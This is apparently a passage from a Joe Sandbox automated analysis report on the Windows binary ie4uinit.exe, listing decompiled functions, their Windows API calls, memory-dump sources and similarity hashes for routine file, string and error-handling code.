				E00007FF77FF7319D51E0(__ebx, _t33, __rbx, _t80, __rsi, _t102,  &_v40);
				_t119 = _v40;
				goto 0x319d71df;
				if (0x80070057 < 0) goto 0x319d72c2;
				if (_t119 == 0) goto 0x319d7226;
				_t63 =  *_t119 - r12b;
				if (_t63 == 0) goto 0x319d7207;
				_t81 = _t80 - 1;
				if (_t63 != 0) goto 0x319d71f9;
				asm("sbb edi, edi");
				if (_t80 - 1 == 0) goto 0x319d7221;
				goto 0x319d722b;
				goto 0x319d722b;
				_t97 =  <  ? __r12 : __r12;
				if (0x80070057 < 0) goto 0x319d72ba;
				_v40 = __r12;
				_v72 =  &_v40;
				_t107 =  <  ? __r12 : __r12;
				if (E00007FF77FF7319D6FC8(_t33,  &_v40, _t77, _t80 - 1, _t119,  <  ? __r12 : __r12,  <  ? __r12 : __r12, __r9, _t121) < 0) goto 0x319d72b0;
				r9d = 0x7fffffff;
				_v72 =  &_v48;
				_v48 = __r12;
				if (E00007FF77FF7319D6BB4( &_v48, _t77, _v40, _t119) < 0) goto 0x319d72a6;
				_v72 = _a56;
				_t37 = E00007FF77FF7319D6478(__ebp, _t77, _t81, _a64, _a48);
				if (_t37 >= 0) goto 0x319d72a6;
				E00007FF77FF7319D210C(_t77, 0x319ec394);
				__imp__#6();
				__imp__#6();
				E00007FF77FF7319C1698(_a56, _t119);
				__imp__#6();
				return _t37;
			}

0x7ff7319d716c
0x7ff7319d716c
0x7ff7319d716f
0x7ff7319d7173
0x7ff7319d7177
0x7ff7319d7192
0x7ff7319d7195
0x7ff7319d7199
0x7ff7319d71a6
0x7ff7319d71b0
0x7ff7319d71b3
0x7ff7319d71b7
0x7ff7319d71c1
0x7ff7319d71c3
0x7ff7319d71cd
0x7ff7319d71d2
0x7ff7319d71d8
0x7ff7319d71e1
0x7ff7319d71ed
0x7ff7319d71f9
0x7ff7319d71fc
0x7ff7319d7201
0x7ff7319d7205
0x7ff7319d720d
0x7ff7319d721a
0x7ff7319d721f
0x7ff7319d7224
0x7ff7319d722d
0x7ff7319d7231
0x7ff7319d723b
0x7ff7319d7242
0x7ff7319d7247
0x7ff7319d7256
0x7ff7319d7260
0x7ff7319d7263
0x7ff7319d726b
0x7ff7319d7278
0x7ff7319d728a
0x7ff7319d728f
0x7ff7319d7298
0x7ff7319d72a1
0x7ff7319d72aa
0x7ff7319d72b4
0x7ff7319d72bd
0x7ff7319d72c6
0x7ff7319d72e7

APIs

Part of subcall function 00007FF7319D60C0: SysFreeString.OLEAUT32 ref: 00007FF7319D6228

SysStringLen.OLEAUT32 ref: 00007FF7319D71B7
SysFreeString.OLEAUT32 ref: 00007FF7319D72AA
SysFreeString.OLEAUT32 ref: 00007FF7319D72B4

Part of subcall function 00007FF7319D51E0: WideCharToMultiByte.KERNEL32 ref: 00007FF7319D5231
Part of subcall function 00007FF7319D51E0: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00007FF7319D563D), ref: 00007FF7319D5277

SysFreeString.OLEAUT32 ref: 00007FF7319D72C6

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: String$Free$ByteCharMultiWide
String ID:
API String ID: 1147213928-0
Opcode ID: 912b7db5958562074d5dff0bf73cc603a27d2047330544aaa78ad7b93a7e22c1
Instruction ID: e70c5c54b998c97e94437e4540ce1d3410dfca67e7d45a8be7c82f5d0bc1e2e9
Opcode Fuzzy Hash: 912b7db5958562074d5dff0bf73cc603a27d2047330544aaa78ad7b93a7e22c1
Instruction Fuzzy Hash: 6C41A033F14A9299EB00ABB2DC084AD63B5BB48B9CB944535DE5C67B4CDF78D901E360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D94B4 Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

VariantCopy.OLEAUT32 ref: 00007FF7319D951B
VariantCopy.OLEAUT32 ref: 00007FF7319D9550
VariantCopy.OLEAUT32 ref: 00007FF7319D9583
SHStrDupW.SHLWAPI(?,?,00007FF7319D4112,?,00000000,?,00007FF7319CD223), ref: 00007FF7319D95CB

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CopyVariant
String ID:
API String ID: 3840901598-0
Opcode ID: 8ba60230642b5cebfc5b9678f6d8a93f4b0ac1eb1b5d0f5aed2864083eed01da
Instruction ID: 28d50cd2a4b6e03d573326607abc3ed6bd9c28a49ddc916fe876f4bb5f3c2e89
Opcode Fuzzy Hash: 8ba60230642b5cebfc5b9678f6d8a93f4b0ac1eb1b5d0f5aed2864083eed01da
Instruction Fuzzy Hash: 01415067F18682A6EB10EF25D448369B3A4FB44748FD08031CF498765CEFB8E994C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319E38D0 Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00007FF77FF7319E38D0(void* __eax, signed int __ecx, void* __rcx) {
				void* _t4;

				_t4 = __rcx -  *0x319f4658; // 0x8be7dd1f02a
				if (_t4 != 0) goto 0x319e38e9;
				asm("dec eax");
				if ((__ecx & 0x0000ffff) != 0) goto 0x319e38e5;
				return __eax;
			}

0x7ff7319e38d0
0x7ff7319e38d7
0x7ff7319e38d9
0x7ff7319e38e2
0x7ff7319e38e4

APIs

RtlCaptureContext.NTDLL ref: 00007FF7319E3943
RtlLookupFunctionEntry.NTDLL ref: 00007FF7319E3962
RtlVirtualUnwind.NTDLL ref: 00007FF7319E39AF
__raise_securityfailure.LIBCMT ref: 00007FF7319E3A94

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
String ID:
API String ID: 140117192-0
Opcode ID: 1afc0c836a71fe0cb30523bcfad7e1d4bea24c494408526ed91d439c61f99075
Instruction ID: 338b3d80c6f555f57f7450ae8be2b794e044c70da69ec8fbe957c2f82c23deac
Opcode Fuzzy Hash: 1afc0c836a71fe0cb30523bcfad7e1d4bea24c494408526ed91d439c61f99075
Instruction Fuzzy Hash: DC41C435A0EB81E1EB10AB08F880365B3A4FB89759FD04136D98D43768DFBDE554E720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DB8DC Relevance: 6.1, APIs: 4, Instructions: 72fileCOMMON

Download Yara Rule

APIs

#791.IERTUTIL(?,?,?,?,00000000,?,?,00007FF7319DB44E), ref: 00007FF7319DB92D
CreateFileW.KERNEL32 ref: 00007FF7319DB95C
GetLastError.KERNEL32 ref: 00007FF7319DB965
#134.IERTUTIL ref: 00007FF7319DB9B2

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: #134#791CreateErrorFileLast
String ID:
API String ID: 3111463030-0
Opcode ID: d0b15d3654442c8dea60c71dc28eaf8dacccae5dcb625bd1ce301684c44a06e4
Instruction ID: bf3e65ead6146d2f4c2395b3d9ddf25e12a0959a2a639c80f7dc65d8cc8c7aef
Opcode Fuzzy Hash: d0b15d3654442c8dea60c71dc28eaf8dacccae5dcb625bd1ce301684c44a06e4
Instruction Fuzzy Hash: 90210533E087C196E7109F22A844269B791BB99BB8F858335CEAA037D8CF7CD441D710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DDDDC Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aee53172f4580d420a9a30e189f8fc0451ca67aa92be891b2eb99f90b2f2993
Instruction ID: 0c3be66c4bc6b23062c19b0fb49ed5877a146e78f5b31e6a17c51d2db8264335
Opcode Fuzzy Hash: 2aee53172f4580d420a9a30e189f8fc0451ca67aa92be891b2eb99f90b2f2993
Instruction Fuzzy Hash: 5211C632F0DBC2D5EB505F15B884629E3D4AF58B94F948134D68D83698DFACE4506730

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DC018 Relevance: 6.1, APIs: 4, Instructions: 52fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7319DB80C: SetFilePointer.KERNEL32(?,?,00000000,00007FF7319DC036), ref: 00007FF7319DB81A
Part of subcall function 00007FF7319DB80C: GetLastError.KERNEL32(?,?,00000000,00007FF7319DC036), ref: 00007FF7319DB827
Part of subcall function 00007FF7319DB80C: GetLastError.KERNEL32(?,?,00000000,00007FF7319DC036), ref: 00007FF7319DB83B

ReadFile.KERNEL32 ref: 00007FF7319DC058
GetLastError.KERNEL32 ref: 00007FF7319DC078
GetLastError.KERNEL32 ref: 00007FF7319DC08C

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$File$PointerRead
String ID:
API String ID: 839530781-0
Opcode ID: 1246d8e4e741d3e086ee3f763519d55967d5038ece7dce43a24273ac0f0a5280
Instruction ID: 73a00053e8dff505997445d332d9573aa8e5d8dc99aa116ab6feec3fb6d71eb1
Opcode Fuzzy Hash: 1246d8e4e741d3e086ee3f763519d55967d5038ece7dce43a24273ac0f0a5280
Instruction Fuzzy Hash: 75118472F086C2D6EB10AF65E88412AF3E0BB45794F944139DA4DC265CDFBDD444AB21

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319E3AA4 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00007FF7319E3AAF
RtlLookupFunctionEntry.NTDLL ref: 00007FF7319E3ACE
RtlVirtualUnwind.NTDLL ref: 00007FF7319E3B1B
__raise_securityfailure.LIBCMT ref: 00007FF7319E3B91

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
String ID:
API String ID: 140117192-0
Opcode ID: 2838714c1a5a295b1b30ecee9008a16367705d667df4a190e14286e372a10043
Instruction ID: 6161dddafbdb0ff959cb5fc2e9b53a54ed292fbce407dff9bf64129a22a0e950
Opcode Fuzzy Hash: 2838714c1a5a295b1b30ecee9008a16367705d667df4a190e14286e372a10043
Instruction Fuzzy Hash: C121C335D1EB81E5EB00AB04F880369B3A4FB89759F904135DA8D43768EFBDE154E760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C69CC Relevance: 6.0, APIs: 4, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

#650.IERTUTIL ref: 00007FF7319C6A0C
#678.IERTUTIL ref: 00007FF7319C6A27
GetProcessHeap.KERNEL32 ref: 00007FF7319C6A34
HeapFree.KERNEL32 ref: 00007FF7319C6A42

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Heap$#650#678FreeProcess
String ID:
API String ID: 315297358-0
Opcode ID: d8765fef9b5ad4db35657f4e0e47e9dd36b265a927d237162de4f7ca882528a4
Instruction ID: ac299c759e1a848cee5658c5253a0113d832fee51fe99db06481d97fe9b31db7
Opcode Fuzzy Hash: d8765fef9b5ad4db35657f4e0e47e9dd36b265a927d237162de4f7ca882528a4
Instruction Fuzzy Hash: D3015B32A18B8183E7009F12E84875DB7A5F788BD8F958134DB5C43718DF79D945CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D8040 Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00007FF7319D8089
VariantClear.OLEAUT32 ref: 00007FF7319D8092
VariantClear.OLEAUT32 ref: 00007FF7319D809C
CoTaskMemFree.OLE32 ref: 00007FF7319D80BA

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ClearVariant$FreeTask
String ID:
API String ID: 3803759766-0
Opcode ID: 1a8f1dc7bf4eccc52b1f31668ab4c6bb178a0e82b67953b9ce666b2428af051b
Instruction ID: 749e5a676dc61b4ca85bcf17b29d022fb35e7e9ede6baaadc1338b54948752e5
Opcode Fuzzy Hash: 1a8f1dc7bf4eccc52b1f31668ab4c6bb178a0e82b67953b9ce666b2428af051b
Instruction Fuzzy Hash: 2911A032E09B8296EB10AF16E4400A9B364FB44B68F948131EB4D03769CF7CD596C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DD9AC Relevance: 6.0, APIs: 4, Instructions: 38fileCOMMON

Download Yara Rule

APIs

FlushViewOfFile.KERNEL32(?,?,80070000,00007FF7319DAD88,?,?,?,?,?,?,00000000,00007FF7319DB3AD), ref: 00007FF7319DD9CD
GetLastError.KERNEL32(?,?,80070000,00007FF7319DAD88,?,?,?,?,?,?,00000000,00007FF7319DB3AD), ref: 00007FF7319DD9D7
GetLastError.KERNEL32(?,?,80070000,00007FF7319DAD88,?,?,?,?,?,?,00000000,00007FF7319DB3AD), ref: 00007FF7319DD9EB

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$FileFlushView
String ID:
API String ID: 1289402859-0
Opcode ID: 9e1235a38a9a82b667f4b9b259bc074e26f118721014f768e1804b2360a2bfb2
Instruction ID: a0e8d785fe4d3aefcc360a93e3718b332bcfbb6eff91b10003ad4bd7754e3059
Opcode Fuzzy Hash: 9e1235a38a9a82b667f4b9b259bc074e26f118721014f768e1804b2360a2bfb2
Instruction Fuzzy Hash: 73018621F0DA86DAEF546B7A9CD833563D16F88748F948038D50FC6198ED9DDC417320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DF3B8 Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00007FF77FF7319DF3B8(void* __eax, long long __rbx, void* __rcx, long long __rsi, long long _a8, long long _a16) {
				long _t9;
				long _t11;
				long _t13;
				void* _t17;

				_a8 = __rbx;
				_a16 = __rsi;
				r8d = 0;
				__imp__QueueUserWorkItem();
				if (__eax == 0) goto 0x319df3e8;
				goto 0x319df424;
				_t9 = GetLastError();
				_t10 =  ==  ? 1 : _t9;
				_t25 =  ==  ? 1 : _t9;
				if (( ==  ? 1 : _t9) > 0) goto 0x319df40b;
				_t11 = GetLastError();
				_t12 =  ==  ? 1 : _t11;
				_t17 =  ==  ? 1 : _t11;
				goto 0x319df41f;
				_t13 = GetLastError();
				_t14 =  ==  ? 1 : _t13;
				_t18 = ( ==  ? 1 : _t13) & 0x0000ffff;
				_t19 = ( ==  ? 1 : _t13) & 0x0000ffff | 0x80070000;
				 *((intOrPtr*)(__rcx + 8)) = 3;
				return ( ==  ? 1 : _t13) & 0x0000ffff | 0x80070000;
			}

0x7ff7319df3b8
0x7ff7319df3bd
0x7ff7319df3d4
0x7ff7319df3d7
0x7ff7319df3e1
0x7ff7319df3e6
0x7ff7319df3e8
0x7ff7319df3f5
0x7ff7319df3f8
0x7ff7319df3fa
0x7ff7319df3fc
0x7ff7319df404
0x7ff7319df407
0x7ff7319df409
0x7ff7319df40b
0x7ff7319df413
0x7ff7319df416
0x7ff7319df419
0x7ff7319df424
0x7ff7319df438

APIs

QueueUserWorkItem.KERNEL32 ref: 00007FF7319DF3D7
GetLastError.KERNEL32 ref: 00007FF7319DF3E8
GetLastError.KERNEL32 ref: 00007FF7319DF3FC

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$ItemQueueUserWork
String ID:
API String ID: 3747073370-0
Opcode ID: 26b459fb07ff8ae6d745b80f7e5de534b080d7b479ac4d3da13ccc66191a0abf
Instruction ID: ebe01f58cd342433385806129ec0728e40f2cc41de54cd5b769b5a6bf638e3c0
Opcode Fuzzy Hash: 26b459fb07ff8ae6d745b80f7e5de534b080d7b479ac4d3da13ccc66191a0abf
Instruction Fuzzy Hash: 1A018822F0C6C296EB506B66E899626E394AF84B54F884034D50DC6558CEECE8426730

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DB80C Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,00000000,00007FF7319DC036), ref: 00007FF7319DB81A
GetLastError.KERNEL32(?,?,00000000,00007FF7319DC036), ref: 00007FF7319DB827
GetLastError.KERNEL32(?,?,00000000,00007FF7319DC036), ref: 00007FF7319DB83B
GetLastError.KERNEL32(?,?,00000000,00007FF7319DC036), ref: 00007FF7319DB848

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 2ca3ebf0f42957a967bdbc28d60f31b8d63a258d449c8d0ece6b9fc095dabbda
Instruction ID: f16bedf448b1505367264ddb52a0c92805ff6c31a96953f8d21c4a50cc6d3304
Opcode Fuzzy Hash: 2ca3ebf0f42957a967bdbc28d60f31b8d63a258d449c8d0ece6b9fc095dabbda
Instruction Fuzzy Hash: 6FF0E220F08A879AFB603B765CCA73663C05F89728F944538C80BC10E4DE9CE8843231

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DB7AC Relevance: 6.0, APIs: 4, Instructions: 30synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(?,?,?,00007FF7319DDB48), ref: 00007FF7319DB7B6
GetLastError.KERNEL32(?,?,?,00007FF7319DDB48), ref: 00007FF7319DB7C2
GetLastError.KERNEL32(?,?,?,00007FF7319DDB48), ref: 00007FF7319DB7D4
GetLastError.KERNEL32(?,?,?,00007FF7319DDB48), ref: 00007FF7319DB7E1

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$MutexRelease
String ID:
API String ID: 3084565237-0
Opcode ID: 33da6c1b214282c24541bd467684402fe332da9d62f878218f4a3fcd0e75c909
Instruction ID: 6baff392f2b24eee7bed39266e0749e354af918d936373989ec01be8692afb15
Opcode Fuzzy Hash: 33da6c1b214282c24541bd467684402fe332da9d62f878218f4a3fcd0e75c909
Instruction Fuzzy Hash: 7FF05462F08A87D7E7402B769CC5666A3D4AF48B48FD88538C50AC5018DE9CE8846330

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C4244 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103
fileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00007FF77FF7319C4244(signed int __edx, long long __rbx, long long __rcx, void* __rdx, void* __r10) {
				void* __rsi;
				void* __rbp;
				void* _t56;
				void* _t65;
				intOrPtr _t72;
				signed long long _t80;
				long long _t83;
				void* _t108;
				signed long long _t110;
				long long _t113;
				void* _t115;
				void* _t116;
				void* _t118;
				signed long long _t119;
				void* _t129;
				void* _t131;
				void* _t134;
				void* _t136;

				_t128 = __r10;
				_t101 = __rdx;
				 *((long long*)(_t118 + 0x18)) = __rbx;
				_t2 = _t118 - 0x9a0; // -2558
				_t116 = _t2;
				_t119 = _t118 - 0xaa0;
				_t80 =  *0x319f4658; // 0x8be7dd1f02a
				 *(_t116 + 0x990) = _t80 ^ _t119;
				r14d = r8d;
				_t83 = __rcx;
				r12d = 0;
				_t4 = _t116 + 0x360; // -1694
				 *((intOrPtr*)(_t116 + 0x360)) = r12w;
				_t110 = __edx + __edx * 2 + __edx + __edx * 2;
				E00007FF77FF7319C1310(__rcx, _t4, __rdx,  *((intOrPtr*)(0x319e5500 + 8 + _t110 * 8)), __r10);
				_t11 = _t116 + 0x360; // -1694
				E00007FF77FF7319C8A08(__rcx, _t11, _t113);
				_t12 = _t116 + 0x360; // -1694
				_t13 = _t116 + 0x150; // -2222
				E00007FF77FF7319C90F4(r9d, _t13, _t101, _t83, _t12, __r10);
				if (r14d == 0) goto 0x319c4307;
				_t14 = _t116 + 0x150; // -2222
				_t15 = _t119 + 0x40; // -30
				E00007FF77FF7319C1310(_t83, _t15, _t101, _t14, __r10);
				_t16 = _t119 + 0x40; // -30
				E00007FF77FF7319C894C(_t65, 0x104, r14d, _t83, _t16, _t113, _t116, _t136, _t134);
				__imp__#165(_t108, _t113, _t115);
				r8d = 0x26;
				_t18 = _t116 + 0x570; // -1166
				E00007FF77FF7319C6680(_t83, _t18, _t113);
				r8d = 0x2a;
				_t19 = _t116 + 0x780; // -638
				_t56 = E00007FF77FF7319C6680(_t83, _t19, _t113);
				if (r14d == 0) goto 0x319c4394;
				if ( *((intOrPtr*)(0x319e5500 + 0x1c + _t110 * 8)) != r12d) goto 0x319c43de;
				_t72 =  *((intOrPtr*)(0x319e5500 + 0x14 + _t110 * 8));
				r14d =  *((intOrPtr*)(0x319e5500 + 0x28 + _t110 * 8));
				__imp__PathFileExistsW();
				if (_t56 != 0) goto 0x319c43de;
